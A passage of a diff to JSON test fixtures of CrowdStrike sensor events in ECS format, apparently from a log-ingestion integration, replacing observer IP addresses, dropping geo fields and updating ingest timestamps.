"ffffffffabd047b1a86c1fcd8ef22b59", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011611.1" + "version": "1007.8.0011611.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:30.922Z", "os": { @@ -3225,18 +2798,18 @@ }, "related": { "hosts": [ - "208.233.54.217" + "67.43.156.14" ], "hash": [ "1156120155" ], "ip": [ - "208.233.54.217" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465682400Z", - "original": "{\"Parameter2\":\"0\",\"event_simpleName\":\"ErrorEvent\",\"Parameter1\":\"18446744072635810412\",\"Parameter3\":\"0\",\"ConfigStateHash\":\"1156120155\",\"aip\":\"208.233.54.217\",\"Line\":\"96\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"ErrorStatus\":\"3759276032\",\"name\":\"ErrorEventLinV1\",\"id\":\"ffffffff-1111-11eb-bdd3-0681aa29cecb\",\"Facility\":\"16778240\",\"aid\":\"ffffffffabd047b1a86c1fcd8ef22b59\",\"File\":\"0\",\"timestamp\":\"1625677530922\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150810300Z", + "original": "{\"Parameter2\":\"0\",\"event_simpleName\":\"ErrorEvent\",\"Parameter1\":\"18446744072635810412\",\"Parameter3\":\"0\",\"ConfigStateHash\":\"1156120155\",\"aip\":\"67.43.156.14\",\"Line\":\"96\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"ErrorStatus\":\"3759276032\",\"name\":\"ErrorEventLinV1\",\"id\":\"ffffffff-1111-11eb-bdd3-0681aa29cecb\",\"Facility\":\"16778240\",\"aid\":\"ffffffffabd047b1a86c1fcd8ef22b59\",\"File\":\"0\",\"timestamp\":\"1625677530922\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:30.922Z", "kind": "alert", "action": "ErrorEvent", @@ -3270,21 +2843,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.24.60.146", - "vendor": "crowdstrike", - "ip": "208.24.60.146", "serial_number": "ffffffffa15a452190ae454f7d33e07e", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:30.590Z", "os": { @@ -3295,18 +2859,18 @@ }, "related": { "hosts": [ - "208.24.60.146" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.24.60.146" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465689200Z", - "original": "{\"event_simpleName\":\"ConfigStateUpdate\",\"ConfigStateHash\":\"3090255842\",\"ConfigStateData\":\"0,0,1007.4.0013701.1|1,2,1|1,4,a|1,6,0|1,8,46|1,a,1|1,c,0|1,17,1f|1,18,18|1,19,0|1,1e,407|1,21,3d2|1,27,1|1,53,18b|1,56,0|1,d0,16d|1,d1,0|1,d2,0|1,df,4c|1,e0,6|1,f6,1|1,1f5,1|1,1f7,1|1,1fd,1|1,200,0|2,0,138,a8000000032,140000000085,140000000153,18000000004c,18000000004f,180000000050,180000000051,180000000054,1800000000e1,1800000000e7,180000000144,18000000014e,18000000015a,18000000020e,180000000226,180000000227,180400000079,18040000009b,18040000009c,1804000000ff,180400000117,180400000118,180400000142,180400000163,180400000164,180400000166,180400000167,1804000001b2,1804000001f2,1804000001f3,180400000225,1804000002be,1804000002bf,1804000002ca,1804000002cb,1808000000c9,1808000000ee,1808000000fc,1808000000fd,1808000000fe,180c0000016b,180c0000016c,180c0000016d,180c0000016e,180c0000016f,180c00000170,180c000001b6,180c000001b7,180c000001b8,180c000001b9,180c000001f6,180c000001f7,180c000001f8,180c000002c2,180c000002c3,180c000002c4,180c000002ce,180c000002cf,180c000002d0,18100000011e,18100000011f,181000000120,181000000121,181000000122,181000000123,181000000124,181000000125,181000000126,181000000128,181000000169,18100000016a,181000000180,1810000001b1,1810000001c3,18100000021f,181000000220,18100000024e,18100000025b,181000000280,1810000002ad,1810000002d6,1810000002d7,1810000002f3,1c04000000a1,1c04000000a2,1c04000000a3,1c04000000a4,1c04000000a5,1c04000000a6,1c040000011a,1c040000011b,1c040000011c,1c0400000268,1c0400000269,1c040000026a,1c040000026c,1c040000026d,1c040000026e,1c0400000271,1c0400000272,1c0400000273,1c0400000275,1c0400000276,1c0400000277,1c040000028f,1c0400000290,1c0400000291,1c0400000293,1c0400000294,1c0400000295,1c0400000297,1c0400000298,1c0400000299,1c040000029b,1c040000029c,1c040000029d,1c040000029f,1c04000002a0|3,0,65|\",\"aip\":\"208.24.60.146\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ConfigStateUpdateMacV2\",\"id\":\"ffffffff-1111-11eb-8dc4-0234c12f9875\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffffa15a452190ae454f7d33e07e\",\"timestamp\":\"1625677530590\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150816600Z", + "original": "{\"event_simpleName\":\"ConfigStateUpdate\",\"ConfigStateHash\":\"3090255842\",\"ConfigStateData\":\"0,0,1007.4.0013701.1|1,2,1|1,4,a|1,6,0|1,8,46|1,a,1|1,c,0|1,17,1f|1,18,18|1,19,0|1,1e,407|1,21,3d2|1,27,1|1,53,18b|1,56,0|1,d0,16d|1,d1,0|1,d2,0|1,df,4c|1,e0,6|1,f6,1|1,1f5,1|1,1f7,1|1,1fd,1|1,200,0|2,0,138,a8000000032,140000000085,140000000153,18000000004c,18000000004f,180000000050,180000000051,180000000054,1800000000e1,1800000000e7,180000000144,18000000014e,18000000015a,18000000020e,180000000226,180000000227,180400000079,18040000009b,18040000009c,1804000000ff,180400000117,180400000118,180400000142,180400000163,180400000164,180400000166,180400000167,1804000001b2,1804000001f2,1804000001f3,180400000225,1804000002be,1804000002bf,1804000002ca,1804000002cb,1808000000c9,1808000000ee,1808000000fc,1808000000fd,1808000000fe,180c0000016b,180c0000016c,180c0000016d,180c0000016e,180c0000016f,180c00000170,180c000001b6,180c000001b7,180c000001b8,180c000001b9,180c000001f6,180c000001f7,180c000001f8,180c000002c2,180c000002c3,180c000002c4,180c000002ce,180c000002cf,180c000002d0,18100000011e,18100000011f,181000000120,181000000121,181000000122,181000000123,181000000124,181000000125,181000000126,181000000128,181000000169,18100000016a,181000000180,1810000001b1,1810000001c3,18100000021f,181000000220,18100000024e,18100000025b,181000000280,1810000002ad,1810000002d6,1810000002d7,1810000002f3,1c04000000a1,1c04000000a2,1c04000000a3,1c04000000a4,1c04000000a5,1c04000000a6,1c040000011a,1c040000011b,1c040000011c,1c0400000268,1c0400000269,1c040000026a,1c040000026c,1c040000026d,1c040000026e,1c0400000271,1c0400000272,1c0400000273,1c0400000275,1c0400000276,1c0400000277,1c040000028f,1c0400000290,1c0400000291,1c0400000293,1c0400000294,1c0400000295,1c0400000297,1c0400000298,1c0400000299,1c040000029b,1c040000029c,1c040000029d,1c040000029f,1c04000002a0|3,0,65|\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ConfigStateUpdateMacV2\",\"id\":\"ffffffff-1111-11eb-8dc4-0234c12f9875\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffffa15a452190ae454f7d33e07e\",\"timestamp\":\"1625677530590\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:30.590Z", "kind": "event", "action": "ConfigStateUpdate", @@ -3379,21 +2943,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.131.106.21", - "vendor": "crowdstrike", - "ip": "208.131.106.21", "serial_number": "ffffffffaa0e47a1b009aef151d6179d", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:09.064Z", "ecs": { @@ -3401,18 +2956,18 @@ }, "related": { "hosts": [ - "208.131.106.21" + "67.43.156.14" ], "hash": [ "1620585913" ], "ip": [ - "208.131.106.21" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465695900Z", - "original": "{\"event_simpleName\":\"KextLoad\",\"ContextTimeStamp\":\"1625677509.064\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"364867547408058681\",\"ContextThreadId\":\"0\",\"aip\":\"208.131.106.21\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"BundleID\":\"com.apple.driver.AudioAUUC\",\"Entitlements\":\"15\",\"name\":\"KextLoadMacV1\",\"id\":\"ffffffff-1111-11eb-a2ae-028f6bf89be7\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffaa0e47a1b009aef151d6179d\",\"timestamp\":\"1625677509069\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150822900Z", + "original": "{\"event_simpleName\":\"KextLoad\",\"ContextTimeStamp\":\"1625677509.064\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"364867547408058681\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"BundleID\":\"com.apple.driver.AudioAUUC\",\"Entitlements\":\"15\",\"name\":\"KextLoadMacV1\",\"id\":\"ffffffff-1111-11eb-a2ae-028f6bf89be7\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffaa0e47a1b009aef151d6179d\",\"timestamp\":\"1625677509069\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:09.069Z", "kind": "event", "action": "KextLoad", @@ -3432,25 +2987,16 @@ "EffectiveTransmissionClass": "2", "Entitlements": "15", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } - }, - { - "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.27.17.203", - "vendor": "crowdstrike", - "ip": "208.27.17.203", + } + }, + { + "observer": { "serial_number": "ffffffff67d54f7daf3d998ffc74d48e", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011110.1" + "version": "1007.8.0011110.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:07.901Z", "os": { @@ -3461,19 +3007,19 @@ }, "related": { "hosts": [ - "208.27.17.203" + "67.43.156.14" ], "hash": [ "3155796140" ], "ip": [ - "208.27.17.203" + "67.43.156.14" ] }, "event": { "action": "ChannelVersionRequired", - "ingested": "2021-11-22T09:23:55.465702600Z", - "original": "{\"ChannelVersion\":\"25\",\"event_simpleName\":\"ChannelVersionRequired\",\"ConfigStateHash\":\"3155796140\",\"aip\":\"208.27.17.203\",\"ChannelVersionRequired\":\"0\",\"ChannelId\":\"20\",\"ConfigBuild\":\"1007.8.0011110.1\",\"event_platform\":\"Lin\",\"name\":\"ChannelVersionRequiredLinV1\",\"id\":\"ffffffff-1111-11eb-b411-06baeacb7a63\",\"aid\":\"ffffffff67d54f7daf3d998ffc74d48e\",\"timestamp\":\"1625677507901\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150829300Z", + "original": "{\"ChannelVersion\":\"25\",\"event_simpleName\":\"ChannelVersionRequired\",\"ConfigStateHash\":\"3155796140\",\"aip\":\"67.43.156.14\",\"ChannelVersionRequired\":\"0\",\"ChannelId\":\"20\",\"ConfigBuild\":\"1007.8.0011110.1\",\"event_platform\":\"Lin\",\"name\":\"ChannelVersionRequiredLinV1\",\"id\":\"ffffffff-1111-11eb-b411-06baeacb7a63\",\"aid\":\"ffffffff67d54f7daf3d998ffc74d48e\",\"timestamp\":\"1625677507901\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-b411-06baeacb7a63", "created": "2021-07-07T17:05:07.901Z" }, @@ -3519,21 +3065,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.203.151.21", - "vendor": "crowdstrike", - "ip": "208.203.151.21", "serial_number": "ffffffffe22549479fbe8293b6747a68", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011308.1" + "version": "1007.8.0011308.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:11.754Z", "ecs": { @@ -3541,19 +3078,19 @@ }, "related": { "hosts": [ - "208.203.151.21" + "67.43.156.14" ], "hash": [ "64e48365207d0c19008ba7d53d75c0de3fcd5a1590e4c40fc69c677663fedc20", "2037712541" ], "ip": [ - "208.203.151.21" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465709400Z", - "original": "{\"event_simpleName\":\"ProcessRollup2Stats\",\"ConfigStateHash\":\"2037712541\",\"Timeout\":\"60\",\"ParentProcessId\":\"0\",\"aip\":\"208.203.151.21\",\"SuppressType\":\"3\",\"SHA256HashData\":\"64e48365207d0c19008ba7d53d75c0de3fcd5a1590e4c40fc69c677663fedc20\",\"ProcessCount\":\"60\",\"BoundedCount\":\"57\",\"ConfigBuild\":\"1007.8.0011308.1\",\"UID\":\"115\",\"event_platform\":\"Lin\",\"CommandLine\":\"sh -c \\\"/usr/lib/erlang/erts-11.1.3/bin/epmd\\\" -daemon\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2StatsLinV3\",\"id\":\"ffffffff-1111-11eb-b34e-063f4cefccb3\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffe22549479fbe8293b6747a68\",\"timestamp\":\"1625677511754\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150835800Z", + "original": "{\"event_simpleName\":\"ProcessRollup2Stats\",\"ConfigStateHash\":\"2037712541\",\"Timeout\":\"60\",\"ParentProcessId\":\"0\",\"aip\":\"67.43.156.14\",\"SuppressType\":\"3\",\"SHA256HashData\":\"64e48365207d0c19008ba7d53d75c0de3fcd5a1590e4c40fc69c677663fedc20\",\"ProcessCount\":\"60\",\"BoundedCount\":\"57\",\"ConfigBuild\":\"1007.8.0011308.1\",\"UID\":\"115\",\"event_platform\":\"Lin\",\"CommandLine\":\"sh -c \\\"/usr/lib/erlang/erts-11.1.3/bin/epmd\\\" -daemon\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2StatsLinV3\",\"id\":\"ffffffff-1111-11eb-b34e-063f4cefccb3\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffe22549479fbe8293b6747a68\",\"timestamp\":\"1625677511754\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:11.754Z", "kind": "state", "action": "ProcessRollup2Stats", @@ -3592,21 +3129,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.165.30.176", - "vendor": "crowdstrike", - "ip": "208.165.30.176", "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T17:04:38.122Z", "ecs": { @@ -3617,18 +3145,18 @@ "user1" ], "hosts": [ - "208.165.30.176" + "67.43.156.13" ], "hash": [ "3967242894" ], "ip": [ - "208.165.30.176" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465718900Z", - "original": "{\"event_simpleName\":\"UserIdentity\",\"LoginSessionId\":\"1138166333440\",\"AuthenticationUuidAsString\":\"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109\",\"UserName\":\"user1\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"208.165.30.176\",\"AuthenticationId\":\"265\",\"UserPrincipal\":\"user1@dom1\",\"UserSid\":\"S-1-5-21-3852557355-3178143607-2040168074-1530\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"265\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"UserIdentityMacV4\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"AuthenticationUuid\":\"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109\",\"timestamp\":\"1625677478122\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150842Z", + "original": "{\"event_simpleName\":\"UserIdentity\",\"LoginSessionId\":\"1138166333440\",\"AuthenticationUuidAsString\":\"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109\",\"UserName\":\"user1\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"67.43.156.13\",\"AuthenticationId\":\"265\",\"UserPrincipal\":\"user1@dom1\",\"UserSid\":\"S-1-5-21-3852557355-3178143607-2040168074-1530\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"265\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"UserIdentityMacV4\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"AuthenticationUuid\":\"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109\",\"timestamp\":\"1625677478122\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:38.122Z", "kind": "event", "action": "UserIdentity", @@ -3665,21 +3193,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.237.139.168", - "vendor": "crowdstrike", - "ip": "208.237.139.168", "serial_number": "ffffffff45d647e6ae0ba8764a4bd570", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:49.052Z", "os": { @@ -3690,20 +3209,20 @@ }, "related": { "hosts": [ - "208.237.139.168" + "67.43.156.14" ], "hash": [ "c89caf538788e6524bf4ae93194051f3389eecbc71e4793f12a2dc0368211cc2", "1620585913" ], "ip": [ - "208.237.139.168" + "67.43.156.14" ] }, "event": { "action": "DeliverLocalFXToCloud", - "ingested": "2021-11-22T09:23:55.465725800Z", - "original": "{\"FeatureVector\":\"000000527b2276223a22312e30222c226e223a352c226c223a3235362c2265223a7b2261223a5b31363737373232332c31363737373232332c31363737373232332c31363737373232332c31363737373232335d7d7d3f48793e3f6837b53f276c8b3ef8d4fe3f036e2f3fdb404f3e361134404d8c7e3df27bb33ef837b53faa57a83e752546402e6b513eb8e2193f5e63203e1446743f295e9e401fb7e93fe010623f90be0e3f6f837b3e7333333f3951833f33afb83e3f62b73e1893753f1b851f3ea752543e9333333ed446743f045a1d40889ba64065d2f2ad9a1b883f573eab3dd773193ed254613f3f3b643eedab9f3f579a6b4082b5dd3f92d42c3e8809d54040fcf83f90a71e40d717593e832ca53e19e83e3b4b295f3f64c2f83f8a9d1f3f27fcb93f088ce73e7333333de944673e81d7dc3f2db22d3e90cb293e2ca57a3e22b6ae3e843fe63f44fdf43f0573eb3ecbc6a83c648e8a3ceb1c433d16c6153c0d4fdf3d0529353e08ce703c2d81ae3f0809d53b69a2c63b7b43d93ded91683ba90cd43e2f9db23b6e28673d646499bb84406c3c0bd6623ea809d53edfb15b3dcc73acbc188d2a3c20cae63d390eaa3d148fda398cfb263b872b023d4d2b2c3a19c60fbc58ec963af9b13139f75bed3f687fcc3f105bc0ae9de3cf3cfb15b53a5dcccfbc2398203c9f40a3ba91e2153d0ec95c3f7e00d23dd048173c13b7d83f3404ea3ef06f69400392643c4dc8753b1f9485bb875d573cdebd903e1a9fbe3be83a113b1528f23c9279143c40053e3b62089e3d06ec183d16e58aba9c7ffe3b30c0273c3cbe623cc9eecc3b1e55c1ba25558f35192b55bcba493d357b1f123422c77e35700fd4349540073385f5c53562b199363180c1bbb5f5f133702cb134553ec134453f1234dfedcabba8e2e3bc4df26734da8f6636e51c133592f7ea34116278be173eabbc11ea79bbb3d4ae3574e4c733a4bbc53046530d34fd74ee330432f8bcf212d7bbaf3e47bc46690534a8a19335420670af1ab38734cdff54338e0e59bd23ad1934a8bd10bd2bb44e3433be90390220d73590265c3481ec3abb7701543b3e1eb437841ede333ede4c31d582ecbc195ee13510b6ab35ab6563b85ae696bcc582563510d9083490265c319cda2abc8327673428415ebba593a3347763df2f713b9cbd14a4d33486ea69bca3ec033d58ec963dc523f63dba7daa3cab9f563d5c67e03e8425af3cdaf8df3f47381d3bab606b3d174e663e6b1c433c4710cb3f04d0143c9691a73e0a233a3bde2ac33d0240b83ee339c13f139c0f3e2fec573df34d6a3d00e6b03df1a9fc3d9fb3fa3b6629953c4100e73d89fe873c0811b23d2d2dcb3ce5de163d0a1dfc3fac816f3f5096bc2e0d65af3df559b43b38ae323cf6555c3d93c3613d78a0903de872b03eb439583e27ef9e3c1689443f7c8b443eb06f694010ce703cff822c3c2d81ae3b0e68e43db5e2043e6b367a3d355ef23d1b089a3c5898b33bd373b03c41d29e3decbfb13d8a0e413bd9dfdb3c2dab9f3d1fddec3dcdd2f23cd10f523ce9ccb83f4b2fec3f7119ce3f276c8b3ee831273f036e2f3fe58adb3e361134404d8c7e3df972473ef837b53faab3683e7f1412402f34d73eb8e2193f62339c3e1446743f2041894013e0df3fe010623f90be0e3f6f837b3e7333333f449ba63f30a3d73e3f62b73e1893753f1b851f3ee240b83e9333333ed446743f03d07d40889ba64065d2f2ad8f49d23f4fd8ae3dd14e3c3edde69b3f3e147b3ee5bc023f579a6b409780343f92d42c3e8809d540435f703f90a71e40d717593e832ca53e19b3d03cc13fd13f6374bc3f8a9d1f3f27fcb93f1cd35b3e7333333de388663e884b5e3f29999a3e90cb293e2305533e2147ae3e843fe63f4d013b3f056d5d3ebe28243c6703b03cf084623d14a4d33c093b7e3d05a7093e087fcc3c304ab63f08c7e33b6ad0c43b8893b83dec22683ba8e2e33e2c56d63b6cd8dc3d637de9bb849cb23c08e79b3ea6dc5d3ee00d1b3dcb923abc1fd36f3c1cf56f3d385c683d134acb398c098e3b872b023d4e075f3a108bd4bc564d7f3b029cfe399cd0863f6958103f10b780ae9e16793cf601793a58523cbc231e7e3c9eecc0ba8398a63d0fba883f7d63883dd254613c14c4483f349ba63ef0b0f24003aa263c49afe23b23d70abb875d573cde3fbc3e1a9fbe3bebcc6c3b19d0203c92641b3c402f303b62d1f23d0366513d1797ccba9f40a33b32c83f3c39a1773ccfe9b83b2276b8ba786f1235192b55bcb890d63573a8ab34a531f734c11ccb3495400732a151a8369df96936179953bbbc1f00340207b734553ec134b523e7352bd356bba8e2e3bc4df26733a7cdeb36e51c1335421b0e3515c299be173eabbc11e647bbb3d4ae328448f533aa5c213046530d357f25dd330432f8bcf290acbbae9ee4bc4669053496f7d534ede333af1ab38733a03ec7346522f2bd23ad19353fd9cfbd2bb44e3392336039250bbe34bb34f73618f0ecbb7701543c50e560356884d0330f9fab31d582ecbc19f5e03510b6ab34e35d66b85ac660bcc582563510d9083490265c3399a707bc84a0e43474d02abba593a3342f209630b98ae7bd11fb4033605e7dbc9e59f33d5f11733dc922533db943183ca5a46a3d5b42463e83bcd33cdd2f1b3f47fcb93bae3a3b3d1ceaf23e6978d53c4836653f03a29c3c9afe1e3e096bba3bde76423cfd4bf13ee1e4f73f1418933e2ee6323df1a9fc3cfe1da83df0d8453d9e7ea63b69f6a93c4083123d8a7c5b3c0266773d2e147b3ce978d53d08ce703facf41f3f510cb32e0d9dfa3df2b0213b2bd5dc3cf77af63d94ee393d782d383de978d53eb404ea3e288ce73c2209ab3f7c91d13eb0d8454010e2193cfc65413c2e53653b0ede553db674d13e6ae7d53d361bb03d1c23b83c579d0a3bd3176a3c4447c33dea161e3d8a67623bd477bc3c2f4f0e3d1e6eeb3dd07c853cd4e8fb3cded2893f42de013f6d4fdf3f276c8b3ee1e4f73f036e2f3fe58adb3e361134404d8c7e3df837b53ef18fc53faa57a83e781d7e402d53263eb8e2193f62339c3e1b089a3f204189400eb9f53fe010623f9395813f6a233a3e81ff2e3f41a9fc3f3013a93e2666663e17dbf53f1b851f3ec666663e9333333ed446743f0e560440889ba64065d2f2ad9a1b883f573eab3dd7a7873edde69b3f3f3b643eed42c43f6a30554087f62b3f92d42c3e83958140435f703f90a71e40d717593e832ca53e19ce073cd0917d3f6374bc3f8a9d1f3f26e9793f088ce73e7333333df34d6a3e8710cb3f34f7663ea20c4a3e1a02753e23bcd33e843fe63f3a36e33f0573eb3ec84b5e3c6685db3cef0ae53d17acc53c0b32cf3d05681f3e0831273c2ff6d33f0a29c73b6a9e6f3b88c60d3deecbfb3baa53fc3e2d91683b6c636b3d66d9bebb8533b13c0a0d353ea91d153ee275253dcc9d9dbc159e623c1d27c43d3ad18d3d145b6c3982b47b3b88051d3d4fe9b83a12e7cfbc579d0a3af0a5f0390a9f2b3f69db233f10b780ae9e5a073cfc26573a5a6b1bbc247ed03c9d7343ba9bb6aa3d0f66a53f7d49523dd35a863c151c5c3f35b5743ef1d14e40047f243c4d9e843b24095fbb87b99d3cdd82fd3e1c28f63beeae9f3b14812c3c91a75d3c40ad043b613f4b3d033c603d195033ba9d8c6d3b307d0b3c3d12453cd234ec3b25375dba904f6e35181195bcba493d35a2674934a531f7352bda363522229033be54dc337b157336151dabbbb5f5f1340207b7345d30d93421b49d34c2b91cbba8e2e3bc4df26733a7cdeb369116e13592f7ea34116278be173eabbc11e647bbb3d4ae328448f533b7f4153046530d359e3e2233d006d8bcf2cf96bbad9ad8bc466905351da01436249e38af17834033a03ec7346522f2bd1ddc1e35d36497bd2bb44e33bf0a47390220d734c2822235531fdebb73ba773c1888f8356884d0330f9fab31d533c2bc195ee135adf23935ab6563b85b06ccbcc84b5e3510d9083490265c33e590e6bc81450f33ce498bbba593a334d1f8602f713b9cbd1930be33605e7dbca3ec033d5d249e3dc85b183dbc115e3ca858793d5c33723e83afb83cdcc63f3f4916873bab47413d1cb6853e6b9f563c49320e3f03eab33c9afe1e3e0aa64c3bdfd6953cfac1d33ee3e4263f14af4f3e2f69443df3b6463cfeda663df2b0213d9faebc3b50678c3c4250723d8c00543c0151a43d2d0e563ce4f7663d0701113fad2bd43f5075f72e0e19d33df5f6fd3b2eb80f3cf487fd3d92e72e3d7842313de944673eb50b0f3e295e9e3c1fd36f3f7d6a163eb15b57401159b43d000a7c3c2d2dcb3b0ecd8e3db4e11e3e6c3c9f3d3adc0a3d1bb0603c52dcb13bd338f83c4100e73de9e1b13d8b53503bd6ece13c2cd9e83d201cd63dd1b7173cda12303cdc725c3f48793e3f6ded293f276c8b3f036e2f3f036e2f3fea0f913e361134404d8c7e3e0189373ef837b53fabc3613e7f62b7403012063eb79a6b3f5e63203e0d4fdf3f204189400de9e23fe010623f90be0e3f6a233a3e81ff2e3f3951833f30902e3e4275253e18793e3f1b851f3ee0f9093e9333333ed446743f045a1d40889ba64065d2f2ad9d19253f573eab3dc692f73ece21963f3f3b643eee2eb23f579a6b407e76c93f92d42c3e83958140435f703f90a71e40d717593e832ca53e25aee63cb7e9103f64c2f83f8a9d1f3f27fcb93f06a7f03e676c8b3de147ae3e884b5e3f27bb303e90cb293e3295ea3e21e4f73e81205c3f3fec573f0573eb3ebec56d3c633eff3cf1800a3d1389b53c0ac1903d0587943e06dc5d3c2efb2b3f095e9e3b67ddca3b80303c3dec8b443ba782903e30068e3b6bcc6c3d619b91bb836eb53c0bf7f03ea60aa63ee00d1b3dcc447cbc28c1553c1d55e73d36e2eb3d132b56399063903b8776813d4d7f0f3a15a1bdbc55cfab3b06f04a39c25a833f68f5c33f107c85ae9e10d83cf9335d3a594a8abc2276b83c9f16b1ba66e57d3d0e0c9e3f7dbf483dd1b7173c1435ad3f34bc6a3ef096bc4003689d3c49afe23b22fcf0bb87a8d63cde939f3e1aee633bedbb5a3b14f69d3c91e6473c402f303b64217d3d06cca33d183516ba9fe8683b33d4ae3c38f9b13cced9173b288f00ba5a42d7356eda97bcb9628d356e0c6f341b95cf341f3c6534ad5b0a32a151a8337b157335b2c72cbbb2852334900adf34553ec1346e5ee5347ab7febba8e2e3bc4df26733a7cdeb35cf19143592f7ea34c9a612be173eabbc11e647bbb3d4ae35219fff33b7f4153046530d348b7aa434677fadbcf290acbbaf2d80bc46690535a6b2cc3206f2a8af17834033a03ec7338e0e59bd1e83e435857ac3bd2bb44e33043df73927249d34bb34f735906b14bb780dc33c50e560361e0a98336f92c2320a0eb4bc19b2c435adf23935ab6563b85a4586bcc56d5d3510d9083490265c3399a707bc811b1e34cde3d7bba593a334aec0612fb676c6bd13be2333605e7dbca3ec033d59be4d3dc9667b3db83cf33ca